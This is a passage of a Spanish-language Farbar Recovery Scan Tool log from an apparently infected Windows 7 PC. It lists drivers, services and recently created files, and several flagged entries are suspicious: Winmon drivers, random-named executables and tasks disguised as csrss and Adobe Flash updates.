R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292096 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Windows -> Microsoft Corporation) <==== ATENCIÓN (no ServiceDLL)
S3 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [152672 2017-04-20] (Bluestack Systems, Inc. -> BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-04-19] (Bluestack Systems, Inc. -> Bluestack System Inc. )
R3 debutfilter; C:\Windows\System32\DRIVERS\debutfilterx64.sys [34512 2015-11-15] (NCH Software -> )
S3 DrmRAudio; C:\Windows\System32\drivers\DrmRAudio.sys [36064 2014-07-28] (cyan soft ltd -> Windows (R) Win 7 DDK provider)
S3 expressvpnsplittunnel; C:\Program Files (x86)\ExpressVPN\splittunnel\expressvpnsplittunnel.sys [18800 2019-08-21] (ExprsVPN LLC -> )
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [54736 2017-04-15] (SurfRight B.V. -> )
R3 L1C; C:\Windows\System32\DRIVERS\L1C62x64.sys [58880 2009-07-27] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
S3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [54272 2009-06-19] (Microsoft Windows -> Atheros Communications, Inc.)
S3 mdf15; C:\Program Files (x86)\Clarus\Samsung SecretZone\mdf15.sys [12288 2010-03-18] () [Archivo no firmado]
S3 mvd21; C:\Program Files (x86)\Clarus\Samsung SecretZone\mvd21.sys [64512 2010-06-14] () [Archivo no firmado]
R1 netfilter_v76; C:\Windows\System32\drivers\netfilter_v76.sys [66000 2015-04-11] (Anqing Inspector Software Ltd. -> Windows (R) Win 7 DDK provider) [Archivo no firmado]
S3 netr28ux; C:\Windows\System32\DRIVERS\netr28ux.sys [867328 2009-06-10] (Microsoft Windows -> Ralink Technology Corp.)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software s.r.o. -> Locktime Software)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 RSUSBSTOR; C:\Windows\System32\Drivers\RtsUStor.sys [216064 2009-06-04] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.)
R1 SCDEmu; C:\Windows\System32\Drivers\SCDEmu.sys [90544 2009-07-26] (Fenghua Lee -> PowerISO Computing, Inc.)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-07-05] () [Archivo no firmado]
S3 StkTMini; C:\Windows\System32\Drivers\StkTMini.sys [528256 2007-11-15] (Syntek Semiconductor Ltd. -> Syntek)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapexpressvpn; C:\Windows\System32\DRIVERS\tapexpressvpn.sys [36208 2019-08-21] (ExprsVPN LLC -> The OpenVPN Project)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42184 2014-05-16] (AnchorFree Inc -> Anchorfree Inc.)
S3 tapnordvpn; C:\Windows\System32\DRIVERS\tapnordvpn.sys [35592 2018-07-24] (TEFINCOM S.A. -> The OpenVPN Project)
S3 tapse01; C:\Windows\System32\DRIVERS\tapse01.sys [39096 2014-12-02] (SurfEasy Inc -> The OpenVPN Project)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATENCIÓN (cero bytes Archivo/Carpeta)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATENCIÓN (cero bytes Archivo/Carpeta)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2020-03-26] (WDKTestCert Admin,131666266076831434 -> ) [Archivo no firmado]
S3 cpuz137; \??\C:\Users\MARCOA~1\AppData\Local\Temp\cpuz137\cpuz137_x64.sys [X] <==== ATENCIÓN
S3 hfFilter; system32\drivers\hfFilter.sys [X]
S3 JakNDisMP; system32\DRIVERS\JakNDis.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-26 14:26 - 2020-03-26 14:29 - 000053378 _____ C:\Users\MARCO AVILA\Desktop\FRST.txt
2020-03-26 14:26 - 2020-03-26 14:28 - 000000000 ____D C:\FRST
2020-03-26 14:22 - 2020-03-26 14:22 - 002279936 _____ (Farbar) C:\Users\MARCO AVILA\Desktop\FRST64.exe
2020-03-26 11:59 - 2020-03-26 12:00 - 000079550 _____ C:\Windows\ntbtlog.txt
2020-03-26 11:50 - 2020-03-26 11:50 - 000003176 _____ C:\Windows\system32\Tasks\{111E94BF-2FBE-4662-8EE2-E722532AD46A}
2020-03-26 11:43 - 2020-03-26 11:43 - 000000000 ____D C:\Windows\system32\Tasks\System
2020-03-26 11:41 - 2020-03-26 11:41 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc
2020-03-26 11:40 - 2020-03-26 11:43 - 000000000 ____D C:\ProgramData\ErrorResponder
2020-03-26 11:40 - 2020-03-26 11:40 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2020-03-26 11:40 - 2020-03-26 11:40 - 000634432 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2020-03-26 11:40 - 2020-03-26 11:40 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-03-26 11:40 - 2020-03-26 11:40 - 000003532 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-03-26 11:40 - 2020-03-26 11:40 - 000003200 _____ C:\Windows\system32\Tasks\csrss
2020-03-26 11:40 - 2020-03-26 11:40 - 000000000 ____D C:\Program Files (x86)\Orchestrale
2020-03-26 11:39 - 2020-03-26 12:17 - 000000510 _____ C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job
2020-03-26 11:39 - 2020-03-26 11:46 - 000000000 ____D C:\ProgramData\SGZPftQsRObztM
2020-03-26 11:39 - 2020-03-26 11:45 - 000000000 ____D C:\ProgramData\pBjXawQUXRlgujtt
2020-03-26 11:39 - 2020-03-26 11:39 - 002300416 _____ C:\Users\MARCO AVILA\AppData\Roaming\rvfecdxs.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 001927680 _____ (Filipe Lourenço ) C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 000002948 _____ C:\Windows\system32\Tasks\Adobe Flash sdk Files Update up_2020326
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\rkitjuoutqb
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Oded
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Newf
2020-03-26 11:39 - 2020-03-26 11:39 - 000000000 ____D C:\ProgramData\Komare
2020-03-26 11:38 - 2020-03-26 11:39 - 002134016 _____ (Akeo Consulting) C:\Users\MARCO AVILA\AppData\Roaming\rgfwedwsax.exe
2020-03-26 11:38 - 2020-03-26 11:38 - 000000000 ____D C:\Program Files (x86)\kiss
2020-03-26 11:35 - 2020-03-26 11:35 - 000000000 ____D C:\Program Files (x86)\MaRS
2020-03-26 11:33 - 2020-03-26 11:34 - 000015602 _____ C:\Windows\SysWOW64\findit.xml
2020-03-26 11:33 - 2020-03-26 11:34 - 000000000 ____D C:\ProgramData\Logic Cramble
2020-03-26 11:33 - 2020-03-26 11:33 - 008509952 _____ C:\Users\MARCO AVILA\AppData\Local\agent.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 002160819 _____ C:\Users\MARCO AVILA\AppData\Local\Plustech.tst
2020-03-26 11:33 - 2020-03-26 11:33 - 001895382 _____ C:\Users\MARCO AVILA\AppData\Local\Suntech.bin
2020-03-26 11:33 - 2020-03-26 11:33 - 000126464 _____ C:\Users\MARCO AVILA\AppData\Local\noah.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ C:\Users\MARCO AVILA\AppData\Local\Config.xml
2020-03-26 11:33 - 2020-03-26 11:33 - 000018432 _____ C:\Users\MARCO AVILA\AppData\Local\Main.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000000000 ____D C:\ProgramData\Snorlers
2020-03-26 11:33 - 2020-03-26 11:29 - 004667392 _____ C:\Users\MARCO AVILA\AppData\Local\Plustech.exe
2020-03-26 11:32 - 2020-03-26 11:33 - 000005568 _____ C:\Users\MARCO AVILA\AppData\Local\md.xml
2020-03-26 11:32 - 2020-03-26 11:32 - 000126464 _____ C:\Users\MARCO AVILA\AppData\Local\lobby.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000068474 _____ C:\Users\MARCO AVILA\AppData\Local\Techsing.tst
2020-03-26 11:32 - 2020-03-26 11:32 - 000045056 _____ C:\Users\MARCO AVILA\AppData\Local\ApplicationHosting.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000000000 ____D C:\ProgramData\CloudPrinter
2020-03-26 11:32 - 2020-03-26 11:29 - 004667392 _____ C:\Users\MARCO AVILA\AppData\Local\Techsing.exe
2020-03-26 11:31 - 2020-03-26 11:32 - 000016368 _____ C:\Users\MARCO AVILA\AppData\Local\InstallationConfiguration.xml
2020-03-26 11:31 - 2020-03-26 11:31 - 000142336 _____ C:\Users\MARCO AVILA\AppData\Local\installer.dat
2020-03-26 11:28 - 2020-03-26 11:48 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\inetinfoservice
2020-03-25 18:28 - 2020-03-26 11:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\TimerUtc
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\PatchMyPC
2020-03-25 18:13 - 2020-03-25 18:13 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\Patch_My_PC,_LLC
2020-03-25 16:27 - 2020-03-25 16:27 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\cache
2020-03-25 16:10 - 2020-03-25 16:10 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbam
2020-03-25 16:09 - 2020-03-25 16:13 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\mbamtray
2020-03-25 16:09 - 2020-03-25 16:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2020-03-25 16:08 - 2020-03-25 16:08 - 000000000 ____D C:\ProgramData\MB2Migration
2020-03-25 14:28 - 2016-09-02 09:40 - 000631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 005548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:35 - 000706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-03-25 14:28 - 2016-09-02 09:35 - 000154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2020-03-25 14:28 - 2016-09-02 09:35 - 000095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2020-03-25 14:28 - 2016-09-02 09:31 - 000503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:31 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 001464320 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:30 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2020-03-25 14:28 - 2016-09-02 09:21 - 003944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2020-03-25 14:28 - 2016-09-02 09:18 - 001314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2020-03-25 14:28 - 2016-09-02 09:16 - 000141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2020-03-25 14:28 - 2016-09-02 09:02 - 000148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2020-03-25 14:28 - 2016-09-02 08:58 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2020-03-25 14:28 - 2016-09-02 08:55 - 000159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2020-03-25 14:28 - 2016-09-02 08:54 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2020-03-25 14:28 - 2016-06-06 10:50 - 001483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-03-25 14:28 - 2016-06-06 09:23 - 001176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2020-03-25 14:28 - 2016-05-13 16:09 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-03-25 14:28 - 2016-05-13 16:07 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2020-03-25 14:28 - 2016-05-13 15:55 - 002607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:53 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-03-25 14:28 - 2016-05-13 15:52 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-03-25 14:28 - 2016-05-13 15:52 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-03-25 14:28 - 2016-05-13 15:38 - 000035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2020-03-25 14:28 - 2016-05-13 15:38 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-03-25 14:28 - 2016-05-12 11:14 - 000862208 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 09:18 - 000572416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2020-03-25 14:28 - 2016-05-12 07:05 - 000459640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2020-03-25 14:28 - 2016-05-12 07:05 - 000297984 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-12 07:04 - 000249352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2020-03-25 14:28 - 2016-05-04 11:21 - 000114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2020-03-25 14:28 - 2016-05-04 11:17 - 003244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-03-25 14:28 - 2016-05-04 11:17 - 002365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-03-25 14:28 - 2016-05-04 09:04 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2020-03-25 14:28 - 2016-02-05 12:56 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\tbs.dll
2020-03-25 14:28 - 2016-02-05 12:54 - 000109568 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2020-03-25 14:28 - 2016-02-05 11:33 - 000015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbs.dll
2020-03-25 14:28 - 2015-06-03 14:21 - 000451080 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2020-03-25 14:27 - 2016-09-02 09:31 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:30 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2020-03-25 14:27 - 2016-09-02 09:16 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
